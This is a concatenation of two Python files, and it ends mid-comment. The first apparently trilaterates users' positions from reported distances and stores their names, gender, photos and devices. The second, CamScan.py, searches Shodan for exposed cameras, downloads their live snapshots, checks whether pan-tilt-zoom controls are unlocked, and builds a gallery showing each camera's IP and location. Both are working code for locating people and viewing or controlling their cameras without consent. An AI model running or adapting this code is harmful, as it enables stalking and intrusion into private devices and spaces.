print("Update ids {0}.".format(n))
n = self.UpdateUser(ids)
print("Update users {0}.".format(n))
except Exception as e:
break
print("Quit Core.")
def producer(self, data):
# self.queue.put(data)
# return true
obj = self.produce_obj(data)
if not obj:
return None
if global_key_la not in obj or global_key_lo not in obj or global_key_list not in obj:
return None
return self.producer_action(obj)
def producer_action(self, obj):
try:
count = self.produce_bulk(obj, global_db_origin_collection, global_db_user_collection )
return count
except Exception as e:
error_print(e)
print(obj)
pass
return None
def produce_obj(self, data):
try:
obj = json.loads(data)
return obj
except Exception as e:
error_print(e)
return None
def produce_bulk(self, obj, opoints, users):
if not obj:
return None
db = self.connect.get_database(global_db_name)
o_coll = db.get_collection(opoints)
u_coll = db.get_collection(users)
o_bulk = o_coll.initialize_unordered_bulk_op()
u_bulk = u_coll.initialize_unordered_bulk_op()
ids = set()
for origin in self.parser_obj(obj):
data = self.produce_insert_origin(origin)
if not data:
continue
o_bulk.insert( data )
ids.add(data[global_key_uid])
f, d = self.produce_update_user(origin)
if not f or not d:
continue
u_bulk.find(f).upsert().update(d)
self.start_calc_ids(list(ids))
result = o_bulk.execute()
count = result['nInserted']
result = u_bulk.execute()
# count = result['nUpserted'] + result['nModified']
return count > 0
def produce_insert_origin(self, origin):
try:
for n in global_origin_keys:
if n not in origin:
return None
data = {}
data[global_key_uid] = str(origin[global_key_uid])
data[global_key_dis] = str(origin[global_key_dis])
data[global_key_sendtime] = str(origin[global_key_sendtime])
data["loc"] = { "type": "Point", "coordinates": [ float(origin[global_key_lo]), float(origin[global_key_la]) ] }
data["time"] = time_now()
return data
except Exception as e:
pass
return None
def produce_update_user(self, origin):
try:
data = origin.copy()
for key in global_origin_keys[1:]:
if key in data:
del data[key]
data["time"] = time_now()
f = {global_key_uid: data[global_key_uid]}
d = {}
if "device" in data:
d["$addToSet"] = {"device": data["device"]}
del data["device"]
d["$set"] = data
d["$inc"] = {"ocount": 1}
return f, d
except Exception as e:
pass
return None, None
def standardize_data(self, origin):
if "sex" in origin:
value = int(origin["sex"])
del origin["sex"]
try:
if value == 1:
origin[global_key_gender] = "male"
elif value == 2:
origin[global_key_gender] = "female"
else:
origin[global_key_gender] = "none"
except Exception as e:
origin[global_key_gender] = "none"
return origin
def parser_obj(self, obj):
for key in global_care_keys:
if key not in obj:
return
if not obj[global_key_list]:
return
unique = {}
unique[global_key_sendtime] = obj[global_key_sendtime]
unique[global_key_la] = obj[global_key_la]
unique[global_key_lo] = obj[global_key_lo]
if global_key_device in obj:
unique[global_key_device] = obj[global_key_device]
for one in obj[global_key_list]:
if global_key_dis not in one:
continue
uid = CreateUID(one)
if not uid:
continue
ret = unique.copy()
ret.update(one)
ret[global_key_uid] = uid
yield self.standardize_data(ret)
def get_origin_points_data_from_db(self, i, start, end):
f = {"id": i}
c = {"_id": 0, "loc.coordinates":1, "time":1, "distance":1}
ret = []
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_calc_collection)
if start:
f["time"] = {}
f["time"]["$gte"] = start
if end:
if "time" not in f:
f["time"] = {}
f["time"]["$lte"] = end
origin_collection = db.get_collection(global_db_origin_collection)
r = origin_collection.find(f, c).sort("time", pymongo.ASCENDING)
for d in r:
ret.append(d)
return ret
except Exception as e:
error_print(e)
return ret
def cut_list_by_time(self, data, tunit):
origin_list = {}
base_time = global_default_base_time
data = sorted(data, key=lambda x: x["time"]) # keep the sorted result (sorted() does not sort in place)
for d in data:
if not d:
continue
try:
minutes = string_time_to_unit(base_time, d["time"], tunit)
if minutes is None:
continue
if minutes not in origin_list:
origin_list[minutes] = []
origin_list[minutes].append(d)
except Exception as e:
continue
return origin_list, base_time
def check_and_calc_with_data(self, data, tunit, id):
try:
tunit = int(tunit)
except Exception as e:
tunit = global_default_uint_time
dic_data, base_time = self.cut_list_by_time(data, tunit)
if not dic_data:
return None
new_ret = {}
for minutes in dic_data:
key = string_min_whole(minutes + 1, base_time, tunit)
r = self.zone_and_calc(dic_data[minutes], id, key)
new_ret[key] = r
return new_ret
def translate_calc_to_ui(self, new_ret, i):
ret = []
for key in new_ret:
if not new_ret[key]:
continue
d = new_ret[key]
ret.append({global_key_uid: i,
"time": d["time"],
"latitude": d["loc"]["coordinates"][1],
"longitude": d["loc"]["coordinates"][0],
"distance": d["distance"]
})
return ret
def check_and_calc(self, i, start, end, tunit):
data = self.get_origin_points_data_from_db(i, start, end)
if not data:
return None
ret = self.check_and_calc_with_data(data, tunit, i)
if not ret:
return None
return self.translate_calc_to_ui(ret, i)
def zone_and_calc(self, l, i, tm):
if len(l) < 3:
return None
r = calc_postion.calc_list(l, global_EP, fretch_gps_from_data)
if r:
ret = {}
ret[global_key_uid] = i
ret["loc"] = {"type": "Point", "coordinates" : [r[1], r[0]]}
ret["distance"] = r[2]
ret["time"] = tm
ret["level"] = r[3]
return ret
return None
def start_calc_ids(self, ids):
# push in Queue
# in no threading
# start threading
if not ids:
return
self.queue.put(ids)
self.Start_Calc_Thread()
def calc_list_id(self, ids):
tunit = global_default_uint_time
db = self.connect.get_database(global_db_name)
u_coll = db.get_collection(global_db_calc_collection)
u_bulk = u_coll.initialize_unordered_bulk_op()
count = 0
for i in ids:
if not i:
continue
ret = self.calc_one_id(i, u_coll, u_bulk, tunit)
if ret:
count += ret
if count > 0:
try:
result = u_bulk.execute()
count = result['nUpserted'] + result['nModified']
return count
except Exception as e:
error_print(e)
return None
def calc_one_id(self, i, u_coll, u_bulk, tunit):
last_time = None
try:
it = u_coll.find({global_key_uid: i}, {"_id":0, "time": 1}).sort("time", pymongo.DESCENDING).limit(1)
for one in it:
last_time = one["time"]
except Exception as e:
return None
data = self.get_origin_points_data_from_db(i, last_time, None)
if not data or len(data) < 3:
return None
ret = self.check_and_calc_with_data(data, tunit, i)
try:
max = len(ret)
count = 0
for key in ret:
count += 1
d = ret[key]
f = {global_key_uid: i, "level": 0, "time": key}
if not d:
if count >= max: ## in the last time slot, don't insert None into the db
count -= 1
break
d = f
u_bulk.find(f).upsert().update_one({"$set": d})
d = None
f = None
return count
except Exception as e:
error_print(e)
return None
def UpdateUser(self, ids):
db = self.connect.get_database(global_db_name)
uniset = {}
try:
t_coll = db.get_collection(global_db_origin_collection)
for i in ids:
if i not in uniset:
uniset[i] = {}
else:
continue
f = {"id": i}
n = t_coll.find(f).count()
uniset[i]["ocount"] = n
t_coll = db.get_collection(global_db_calc_collection)
for key in uniset:
f = {"id": key}
n = t_coll.find(f).count()
uniset[key]["pcount"] = n
t_coll = db.get_collection(global_db_user_collection)
u_bulk = t_coll.initialize_unordered_bulk_op()
for key in uniset:
u_bulk.find({"id": key}).update({"$set": uniset[key]})
result = u_bulk.execute()
count = result['nModified']
return count
except Exception as e:
error_print(e)
return None
def NearPoint(self, lat, lng, count):
if not count:
count = 20
point = {"type": "Point", "coordinates": [lng, lat]}
f = {"loc": {"$near": {"$geometry": point}}}
c = {"_id": 0, "loc":1, "id": 1, "time": 1, "level": 1, "distance": 1}
db = self.connect.get_database(global_db_name)
coll = db.get_collection(global_db_calc_collection)
it = coll.find(f, c) ## sort by $near
ret = {}
for one in it:
if len(ret) >= count:
break
try:
if one['id'] not in ret:
ret[one['id']] = one
continue
if one['level'] > 0 and one['level'] < ret[one['id']]['level']:
ret[one['id']] = one
continue
if one['time'] > ret[one['id']]['time']:
ret[one['id']] = one
continue
except Exception as e:
continue
if not ret:
return None
c = {"_id": 0, "name": 1, "time": 1, "id": 1, "ocount": 1, "pcount": 1,
"img":1, "sign": 1, global_key_gender: 1}
coll = db.get_collection(global_db_user_collection)
for key in ret:
tmp = ret[key]
ret[key] = {global_key_uid: key,
"time": tmp["time"],
"latitude": tmp["loc"]["coordinates"][1],
"longitude": tmp["loc"]["coordinates"][0],
"distance": tmp["distance"]
}
f = {"id": key}
try:
it = coll.find(f, c).sort("time", pymongo.DESCENDING).limit(1)
for one in it:
ret[key].update(one)
except Exception as e:
pass
if ret:
tmp = []
for key in ret:
tmp.append(ret[key])
ret = tmp
return ret
## update by user
'''
UI action
'''
def create_filter_for_user(self, obj):
regex_list = ["name", "sign", "province", "city"]
bool_list = {"country": "CN"}
select_list = {"gender": ("female", "male")}
match_list = ["id", "device"]
gte_list = ["ocount", "pcount"]
time_list = ["start", "end"]
for key in ["ocount", "pcount"]:
if key in obj and obj[key] is not None:
obj[key] = int(obj[key])
f = {}
for key in obj:
if not obj[key]:
continue
if key in regex_list:
f[key] = {'$regex': obj[key], '$options': "i"}
continue
if key in bool_list:
if obj[key] == bool_list[key]:
f[key] = obj[key]
else:
f[key] = {"$not": {"$eq": bool_list[key]}}
continue
if key in select_list:
try:
s = str(obj[key]).lower()
if s in select_list[key]:
f[key] = s
except Exception as e:
pass
continue
if key in match_list:
f[key] = obj[key]
continue
if key in gte_list:
f[key] = {"$gte": obj[key]}
continue
if key in time_list:
obj[key] = string_standard(obj[key])
if "time" not in f:
f["time"] = {}
if key == "start":
f["time"]["$gte"] = obj[key]
elif key == "end":
f["time"]["$lte"] = obj[key]
continue
return f
def create_row_for_user(self):
return {"_id": 0,
"name": 1, "time": 1, "id": 1,
"device": 1, "ocount": 1, "pcount": 1,
"country":1, "province":1, "city":1,
"img":1, "sign": 1, global_key_gender: 1}
def show_search(self, obj):
f = self.create_filter_for_user(obj)
c = self.create_row_for_user()
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_user_collection)
r = collection.find(f, c).sort("time", pymongo.DESCENDING)
ret = []
for d in r:
ret.append(d)
return ret
except Exception as e:
error_print(e)
return None
def show_name(self, name):
f = self.create_filter_for_user({"name": name})
c = self.create_row_for_user()
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_user_collection)
r = collection.find(f, c).sort("time", pymongo.DESCENDING)
ret = []
for d in r:
ret.append(d)
return ret
except Exception as e:
error_print(e)
return None
def origin_points(self, id, start, end):
f = {"id": id}
if start:
f["time"]={}
f["time"]["$gte"]=start
if end:
if "time" not in f:
f["time"]={}
f["time"]["$lte"]=end
c = {"_id":0, "loc.coordinates": 1, "time": 1, "distance": 1, "sendtime": 1}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_origin_collection)
r = collection.find(f, c).sort("time", pymongo.DESCENDING)
ret = []
for d in r:
tmp = {}
if "loc" in d and "coordinates" in d["loc"] and len(d["loc"]["coordinates"]) > 1:
tmp["latitude"] = d["loc"]["coordinates"][1]
tmp["longitude"] = d["loc"]["coordinates"][0]
else:
continue
if "time" in d:
tmp["time"] = d["time"]
else:
continue
if "sendtime" in d:
tmp["sendtime"] = d["sendtime"]
if "distance" in d:
tmp["distance"] = d["distance"]
ret.append(tmp)
return ret
except Exception as e:
error_print(e)
return None
def origin_points_uni(self, id, start, end):
f = {"id": id}
if start:
f["time"]={}
f["time"]["$gte"]=start
if end:
if "time" not in f:
f["time"]={}
f["time"]["$lte"]=end
c = {"_id":0, "loc.coordinates": 1, "time": 1, "distance": 1, "sendtime": 1}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_origin_collection)
r = collection.find(f, c).sort("time", pymongo.DESCENDING)
uniset = {}
min_time = None
for d in r:
tmp = {}
if "loc" in d and "coordinates" in d["loc"] and len(d["loc"]["coordinates"]) > 1:
tmp["latitude"] = d["loc"]["coordinates"][1]
tmp["longitude"] = d["loc"]["coordinates"][0]
else:
continue
if "time" in d:
tmp["time"] = d["time"]
else:
continue
if "sendtime" in d:
tmp["sendtime"] = d["sendtime"]
if "distance" in d:
tmp["distance"] = d["distance"]
if not min_time or min_time["time"] > tmp["time"]:
min_time = tmp;
if (tmp["latitude"], tmp["longitude"]) not in uniset or uniset[(tmp["latitude"], tmp["longitude"])]["time"] < tmp["time"]:
uniset[(tmp["latitude"], tmp["longitude"])] = tmp;
ret = []
if min_time:
if (min_time["latitude"], min_time["longitude"]) in uniset and uniset[(min_time["latitude"], min_time["longitude"])]["time"] == min_time["time"]:
del uniset[(min_time["latitude"], min_time["longitude"])]
ret.append(min_time)
for one in uniset.itervalues():
ret.append(one)
return ret
except Exception as e:
error_print(e)
return None
'''
Device Action
'''
def set_device(self, task, device, la, lo):
f = {"device": device, "task": task}
data ={"$set": {"device": device,
"loc": {"type": "Point", "coordinates" : [lo, la]},
"time": time_now()} }
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
r = collection.update_one(f, data, True)
return r.modified_count or r.upserted_id
except Exception as e:
error_print(e)
return None
def device_obj(self, task, data):
try:
obj = json.loads(data)
tmp = []
task_len = len(task)
max_name = ''
name = "!"
for one in obj:
if "latitude" not in one or "longitude" not in one:
continue
name = "!"
if "device" in one and one["device"][0:task_len] == task:
name = str(one["device"])
if max_name < name:
max_name = name
tmp.append((name, one["latitude"], one["longitude"]))
tmp = sorted(tmp, key=lambda x: x[0])
number = 0
if max_name:
try:
number = int(max_name[task_len:])
except Exception as e:
error_print(e)
pass
if number < 1:
number = 1
else:
number += 1
ret = {}
for one in tmp:
name = one[0]
if name in ret or name == "!":
name = "{0}{1:04d}".format(task, number)
number += 1
ret[name] = (one[1], one[2])
return ret
except Exception as e:
error_print(e)
pass
return None
def setall_device(self, task, data):
# find all task point
# loop data
# bulk insert update delete
#
#
obj = self.device_obj(task, data)
if not obj:
if data is None:
return None
### remove all
return self.delete_all_device(task)
f = {"task": task}
c = {"_id": 1, "device": 1, "loc": 1, "time": 1}
action = []
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
bulk = collection.initialize_unordered_bulk_op()
it = collection.find(f, c).sort("time", pymongo.DESCENDING)
count = 0
for one in it:
if "device" not in one or one["device"] not in obj:
bulk.find({"_id": one["_id"]}).remove()
count += 1
continue
tmp = obj[one["device"]]
data = {
"$set": {
"device": one["device"],
"loc":{"type": "Point", "coordinates": [tmp[1], tmp[0]]},
"time": time_now(),
"task": task
}
}
bulk.find({"_id": one["_id"]}).upsert().update(data)
count += 1
del obj[one["device"]]
for key in obj:
data = {
"device": key,
"loc": {"type": "Point", "coordinates": [obj[key][1], obj[key][0]]},
"time": time_now(),
"task": task
}
bulk.insert(data)
count += 1
result = bulk.execute()
count = result['nInserted'] + result['nUpserted'] + result['nModified'] + result['nRemoved']
if count:
return self.get_device_all(task)
return None
def get_device(self, task, device):
f = {"device": device, "task": task}
c = {"_id": 0, "device": 1, "loc": 1, "time": 1}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
r = collection.find(f, c).sort("time", pymongo.DESCENDING)
ret = []
for d in r:
ret.append({ "device": d["device"],
"time": d["time"],
"latitude": d["loc"]["coordinates"][1],
"longitude": d["loc"]["coordinates"][0],
})
return ret
except Exception as e:
error_print(e)
return None
def delete_device(self, task, device):
f = {"device": device, "task": task}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
return collection.delete_one(f).deleted_count > 0
except Exception as e:
error_print(e)
return None
def delete_all_device(self, task):
f = {"task": task}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
return collection.delete_many(f).deleted_count
except Exception as e:
error_print(e)
return None
def get_device_all(self, task):
f = {"task": task}
c = {"_id": 0, "device": 1, "loc": 1, "time": 1}
try:
db = self.connect.get_database(global_db_name)
collection = db.get_collection(global_db_device_collection)
r = collection.find(f, c).sort([("device", pymongo.ASCENDING), ("time", pymongo.DESCENDING)])
t = {}
for d in r:
if d['device'] not in t:
t[d['device']] = {}
elif t[d['device']]['time'] > d["time"]:
continue
t[d['device']]['time'] = d["time"]
t[d['device']]['latitude'] = d["loc"]["coordinates"][1]
t[d['device']]['longitude'] = d["loc"]["coordinates"][0]
ret = []
for d in t:
ret.append( {
'device': d,
'time': t[d]['time'],
'latitude': t[d]['latitude'],
'longitude': t[d]['longitude'],
} )
return ret
except Exception as e:
error_print(e)
return None
def delete_information(self, t):
if not t:
return None
try:
db = self.connect.get_database(global_db_name)
count = 0
collection = None
if t == "users":
collection = db.get_collection(global_db_user_collection)
elif t == "device":
collection = db.get_collection(global_db_device_collection)
elif t == "points":
collection = db.get_collection(global_db_origin_collection)
elif t == "result":
collection = db.get_collection(global_db_calc_collection)
if not collection:
return count
result = collection.delete_many({})
if result:
count = result.deleted_count
return count
except Exception as e:
error_print(e)
return None
global_unique_opt_obj = None
global_unique_opt_obj_mx = threading.Lock()
def get_unique_opt():
global global_unique_opt_obj
global global_unique_opt_obj_mx
global_unique_opt_obj_mx.acquire()
if not global_unique_opt_obj:
try:
global_unique_opt_obj = opt()
except Exception as e:
global_unique_opt_obj = None
error_print(e)
pass
global_unique_opt_obj_mx.release()
return global_unique_opt_obj
def unique_push_data(data):
obj = get_unique_opt()
if not obj:
return None
return obj.producer(data)
def unique_check_and_calc(id, start, end, tunit):
obj = get_unique_opt()
if not obj:
return None
start = string_standard(start)
end = string_standard(end)
ret = obj.check_and_calc(id, start, end, tunit)
return ret
def unique_origin_points(id, start, end):
obj = get_unique_opt()
if not obj:
return None
start = string_standard(start)
end = string_standard(end)
ret = obj.origin_points(id, start, end)
return ret
def unique_show_name(name):
obj = get_unique_opt()
if not obj:
return None
ret = obj.show_search({"name":name})
return ret
def unique_show_search(args):
obj = get_unique_opt()
if not obj:
return None
ret = obj.show_search(args)
return ret
def unique_set_device(task, device, la, lo):
obj = get_unique_opt()
if not obj:
return None
ret = obj.set_device(task, device, la, lo)
return ret
def unique_setall_device(task, data):
obj = get_unique_opt()
if not obj:
return None
ret = obj.setall_device(task, data)
return ret
def unique_get_device(task, device):
obj = get_unique_opt()
if not obj:
return None
ret = obj.get_device(task, device)
return ret
def unique_get_device_all(task):
obj = get_unique_opt()
if not obj:
return None
ret = obj.get_device_all(task)
return ret
def unique_delete_device(task, device):
obj = get_unique_opt()
if not obj:
return None
ret = obj.delete_device(task, device)
return ret
def unique_delete_information(t):
obj = get_unique_opt()
if not obj:
return None
ret = obj.delete_information(t)
return ret
def unique_NearPoint(lat, lng, count):
obj = get_unique_opt()
if not obj:
return None
ret = obj.NearPoint(lat, lng, count)
return ret
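# Example usage (illustrative sketch only, not part of the original module).
# It assumes a reachable MongoDB instance configured as elsewhere in this
# file; the task and device names below are placeholders.
if __name__ == "__main__":
    unique_set_device("demo-task", "device-001", 31.2304, 121.4737)
    print(unique_get_device("demo-task", "device-001"))
    print(unique_get_device_all("demo-task"))
    unique_delete_device("demo-task", "device-001")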
|
CamScan.py
|
import requests
from shodan import Shodan
from time import sleep,time,localtime
import os
import threading
import webbrowser
import csv
class CamScan:
def __init__(self, dirname='Images', search=None,
path=None, timeout=7, verbose=False):
self.search = search
self.path = path
self.dirname = dirname
self.timeout = timeout
self.pages = {0: None}
self.verbose = verbose
self.api = None
self.live_hosts = []
self.checkPTZ = False
self.checkPTZPath = None
self.store_offline = True
try:
keyfile = open('shodan_api_key','r')
key = keyfile.readline()
keyfile.close()
self.api = Shodan(key)
except FileNotFoundError:
print('Key file not found')
DIR_NUMBER = 2
while os.path.exists(self.dirname):
self.dirname = self.dirname.strip('0987654321') + str(DIR_NUMBER)
DIR_NUMBER += 1
def initShodan(self, key):
with open('shodan_api_key','w') as file:
file.write(key)
self.api = Shodan(key)
def chooseFromCSV(self, file):
if os.path.exists(file):
f = open(file, newline='')
data = csv.DictReader(f)
searches = []
print('Select search from below:\n')
y = 0
for x in data:
item = []
item.append(x['searchQuery'])
item.append(x['imagePath'])
item.append(x['ptzCheckPath'])
item.append(x['friendlyName'])
print(str(y) + ") " + x['friendlyName'])
searches.append(item)
y += 1
f.close()
print("\nSearches marked with (Free) don't require a paid Shodan account to use")
print("Searches marked with [PTZ] support checking for locked PTZ controls")
try:
choice = int(input('Choose search: '))
self.search = searches[choice][0]
self.path = searches[choice][1]
self.checkPTZPath = searches[choice][2]
self.friendly_name = searches[choice][3]
except ValueError:
print("That's not a number...")
except IndexError:
print("That's not one of the choices...")
except Exception:
print("You're an idiot...")
else:
raise FileNotFoundError
def pagesCount(self):
hosts = self.api.count(self.search)['total']
return int(hosts / 100) + 1
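    # Parses a page specification string such as "1,3,5-8" into self.pages,
    # mapping every page number to None (filled in later by shodanSearch).
    # Passing None instead of a string makes run() fetch every page reported
    # by pagesCount().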
def setPages(self, pages_str):
self.pages = {}
        if isinstance(pages_str, str):
for num in pages_str.split(','):
if '-' in num:
r = num.split('-')
for number in range(int(r[0]),int(r[1]) + 1):
self.pages[int(number)] = None
else:
self.pages[int(num)] = None
        elif pages_str is None:
self.pages = None
else:
raise Exception("Page value needs to be a string, or None")
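    # Fetches the configured snapshot path from one Shodan result over HTTP,
    # saves the image when store_offline is enabled, optionally probes the PTZ
    # control path, and records every reachable host in self.live_hosts.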
def requestAndDownload(self, shodan_result):
host = str(shodan_result['ip_str'])
port = str(shodan_result['port'])
url = 'http://{}:{}'.format(host,port) + self.path
self.total += 1
try:
r = requests.get(url, timeout=self.timeout)
if r.status_code == 200:
filename = '{}-{}'.format(host,port) + '.png'
                if self.store_offline:
with open(filename, 'wb') as img:
img.write(r.content)
if self.checkPTZ and self.checkPTZPath:
ptz_url = 'http://{}:{}'.format(host,port) + self.checkPTZPath
ptz_request = requests.get(ptz_url, timeout=self.timeout)
bad_codes = [x for x in range(400,512)]
if ptz_request.status_code not in bad_codes:
if self.verbose:
                            print('[Info] Connection to {}:{} successful, camera possibly controllable'.format(host,port))
self.ptz_count += 1
self.live_hosts.append([filename,shodan_result,True])
else:
if self.verbose:
                            print('[Info] Connection to {}:{} successful, camera controls locked'.format(host,port))
self.live_hosts.append([filename,shodan_result,False])
else:
if self.verbose:
                        print('[Info] Connection to {}:{} successful'.format(host,port))
self.live_hosts.append([filename,shodan_result,False])
self.success_count += 1
else:
self.failed_count += 1
if self.verbose:
print('[HTTP {} Error] Connection to {}:{} failed'.format(r.status_code,host,port))
except requests.exceptions.ReadTimeout:
self.failed_count += 1
if self.verbose:
print('[Network Error] Connection to {}:{} timed out'.format(host,port))
except Exception as e:
self.failed_count += 1
#print(e)
if self.verbose:
print('[Network Error] Connection to {}:{} failed'.format(host,port))
def _runOnPage(self, pagenumber):
r = self.pages[pagenumber]
if self.verbose:
print("[Info] Contacting hosts on page",pagenumber)
for result in r['matches']:
x = threading.Thread(target=self.requestAndDownload, args=(result,))
self.threads.append(x)
x.start()
#for thread in threads:
# thread.join()
def shodanSearch(self):
        if self.api is None:
raise Exception('Shodan API key not set')
else:
for pageNum in self.pages:
if self.verbose:
print("[Info] Searching shodan on page",pageNum)
tries = 0
                while self.pages[pageNum] is None:
try:
self.pages[pageNum] = self.api.search(self.search, page=pageNum)
except Exception as e:
tries += 1
if "upgrade your API plan" in e.args[0]:
print("[Fatal error] Paid Shodan account required for pages and search filters.")
self.end = True
break
if tries == 35:
print("[Fatal Error] Shodan not responding correctly, giving up")
self.end = True
break
print("[API Error]", e, "- Retrying...")
sleep(1.5)
def run(self):
self.success_count = 0
self.failed_count = 0
self.ptz_count = 0
self.total = 0
self.end = False
self.threads = []
        if self.pages is None:
self.pages = {}
for page in range(1,self.pagesCount() + 1):
self.pages[page] = None
os.mkdir(self.dirname)
os.chdir(self.dirname)
print('Saving images to', os.getcwd(), '\n')
threading.Thread(target=self.shodanSearch).start()
print("[Info] Starting...")
start_time = time()
t = localtime()
self.start_time_str = "{}/{}/{} {}:{}:{}".format(t[1],t[2],t[0],t[3],t[4],t[5])
for page in self.pages:
            while self.pages[page] is None and not self.end:
sleep(.1)
if not self.end:
self._runOnPage(page)
for thread in self.threads:
thread.join()
if self.verbose:
print("[Info] Completed")
self.time_elapsed = time() - start_time
def generatePage(self,open_on_completion=True):
if self.checkPTZ and self.checkPTZPath:
ptz_box = '''
<div class="thing">
<label for="ptz_box">Hide hosts with closed PTZ controls:</label>
<input id="ptz_box" type="checkbox" onchange="ptzCheckBox()">
</div>'''
else:
ptz_box = ""
html = '''<!DOCTYPE html>
<html>
<head>
<title>'''+self.friendly_name+'''</title>
<script>
function changeColumns() {
let columns = parseInt(document.getElementById('cols').value);
let gallery = document.getElementsByClassName("gallery")[0];
let images = document.getElementsByTagName("img");
let s = "";
let h;
for (let i = 0; i < columns; i++ ) {
s += "auto ";
}
gallery.style.gridTemplateColumns = s;
switch (columns) {
case 2:
h = 700;
break;
case 3:
h = 480;
break;
case 4:
h = 300;
break;
}
for (let i = 0; i < images.length; i++) {
images[i].height = h;
}
}
let nonptz_list = [];
let all_items = [];
let not_ran = true;
function ptzCheckBox() {
const gal = document.getElementsByClassName("gallery")[0];
let all = gal.getElementsByClassName("item");
let box = document.getElementById("ptz_box");
let nonptz_items = gal.getElementsByClassName("nonptz");
if (not_ran) {
for (let i = 0; i < gal.childElementCount; i++) {
all_items.push(all[i]);
}
not_ran = false;
}
for (let i = 0; i < nonptz_items.length; i++) {
nonptz_list.push(nonptz_items[i]);
}
if (box.checked) {
for (let i = 0; i < nonptz_list.length; i++) {
nonptz_list[i].remove()
}
} else {
for (let i = 0; i < all_items.length; i++) {
all_items[i].remove();
}
for (let i = 0; i < all_items.length; i++) {
gal.appendChild(all_items[i]);
}
}
}
</script>
<style>
button {
border: none;
border-radius: 5px;
outline: none;
color: white;
padding: 5px 40px;
text-align: center;
text-decoration: none;
display: inline-block;
font-size: 16px;
margin: 5px 2px;
cursor: pointer;
transition-duration: 0.2s;
background-color: #386fc2;
}
button.shodan_button {
background-color: #be473c
}
button:hover {
background-color: #305896;
}
.shodan_button:hover {
background-color: #a63c32;
}
.gallery {
display: grid;
grid-template-columns: auto auto auto auto;
grid-template-rows: auto;
grid-gap: 10px;
}
.gallery img {
width: 100%;
}
.gallery .item {
position: relative;
overflow: hidden;
}
.gallery .item img {
vertical-align: middle;
}
.gallery .caption {
margin: 0;
padding: .5em;
position: absolute;
z-index: 1;
bottom: 0;
left: 0;
width: 100%;
max-height: 100%;
overflow: auto;
box-sizing: border-box;
transition: transform 0.2s;
transform: translateY(100%);
background: rgba(0, 0, 0, 0.4);
color:white;
font-family: Arial;
}
.gallery .item:hover .caption {
transform: translateY(0%);
}
h1 {
font-family: Arial;
color: white;
}
label {
font-family: Courier New;
color: white;
}
div.container{
display: flex;
background: linear-gradient(#8f8f8f, #757575);
padding: 10px;
border-radius: 17px;
margin-bottom: 8px;
margin: 20px;
}
div.section {
flex: auto;
width: 33%;
}
div.thing {
margin: 5px;
}
.stats_table {
float: right;
font-family: Courier New;
color: white;
}
</style>
</head>
<body style="background-color:black" onload="changeColumns()">
<div class="container">
<div class="section">
<div class="thing">
<label for="cols">Columns:</label>
<select id="cols" onchange="changeColumns()">
<option value="2">2</option>
<option value="3">3</option>
<option value="4" selected="selected">4</option>
</select>
</div>'''+ptz_box+'''
</div>
<div class="section" style="text-align: center;">
<h1>'''+self.friendly_name+'''</h1>
</div>
<div class="section">
<table class="stats_table">
<tr>
<td>Query:</td>
<td>'''+self.search+'''</td>
</tr>
<tr>
<td>Count:</td>
<td>'''+str(self.success_count)+''' open, '''+str(self.failed_count)+''' closed</td>
</tr>
<tr>
<td>Ran at:</td>
<td>'''+self.start_time_str+'''</td>
</tr>
</table>
</div>
</div>
<div class=gallery>
'''
with open('images.html', 'w') as page:
page.write(html)
no_dupes = []
for h in self.live_hosts:
if h not in no_dupes:
no_dupes.append(h)
for host in no_dupes:
link = 'http://' + host[1]['ip_str'] + ':' + str(host[1]['port'])
                if self.store_offline:
img_src = host[0]
if os.path.getsize(host[0]) <= 1:
continue
else:
img_src = link + self.path
if host[2]:
classname = "item ptz"
else:
classname = "item nonptz"
if self.checkPTZ and self.checkPTZPath:
if host[2]:
ptz_controls_tr = '''
<tr>
<td>PTZ Controls:</td>
<td style="font-weight: bold;">Authorized</td>
</tr>'''
else:
ptz_controls_tr = '''
<tr>
<td>PTZ Controls:</td>
<td style="font-weight: bold;">Unauthorized</td>
</tr>'''
else:
ptz_controls_tr = ""
data = (classname,
img_src,
host[1]['ip_str'],
host[1]['location']['city'],
host[1]['location']['country_name'],
host[1]['org'],
ptz_controls_tr,
link,
host[1]['ip_str'])
                element = '''
<div class="%s">
<img src="%s" onerror="this.parentElement.remove()">
<span class="caption">
<table style="margin: auto;color:white;">
<tr>
<td>IP Address:</td>
<td style="font-weight: bold;">%s</td>
</tr>
<tr>
<td>City:</td>
<td style="font-weight: bold;">%s</td>
</tr>
<tr>
<td>Country:</td>
<td style="font-weight: bold;">%s</td>
</tr>
<tr>
<td>Organization:</td>
<td style="font-weight: bold;">%s</td>
</tr>%s
</table>
<div style="text-align: center;">
<a href="%s" target="_blank" style="text-decoration: none">
<button type="submit" class="stream_button">Open stream in new tab</button>
</a>
<a href="https://www.shodan.io/host/%s" target="_blank" style="text-decoration: none">
<button class="shodan_button">Shodan Page</button>
</a>
</div>
</span>
</div>
''' % data
try:
page.write(element)
except UnicodeEncodeError:
if self.verbose:
print("[Unicode Error] That was wierd. UnicodeEncodeError for host", host[1]['ip_str'])
pass
page.write('\n\t</div>\n</body>\n</html>')
if open_on_completion:
webbrowser.open('images.html')
def info(self):
print('search:', self.search)
print('path:', self.path)
print('dirname', self.dirname)
print('timeout:', self.timeout)
try:
print('pages:', len(self.pages))
except TypeError:
print('pages:', None)
print("checkPTZ:", self.checkPTZ)
print("checkPTZPath:", self.checkPTZPath)
def stats(self):
if self.total != 0:
percent_success = int((self.success_count / self.total) * 100)
percent_failure = int((self.failed_count / self.total) * 100)
else:
percent_success = 0
percent_failure = 0
s = "{} out of {} hosts are viewable, {}% success rate".format(self.success_count,self.total,percent_success)
t = "Time elapsed: " + str(int(self.time_elapsed)) + " seconds"
u = "{} hosts found with potentially open PTZ controls".format(self.ptz_count)
return [s,t,u,percent_success,percent_failure]
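# Example usage (illustrative sketch, not part of the original class).
# 'searches.csv' and the API key literal are placeholders: a real Shodan API
# key and a CSV with searchQuery/imagePath/ptzCheckPath/friendlyName columns
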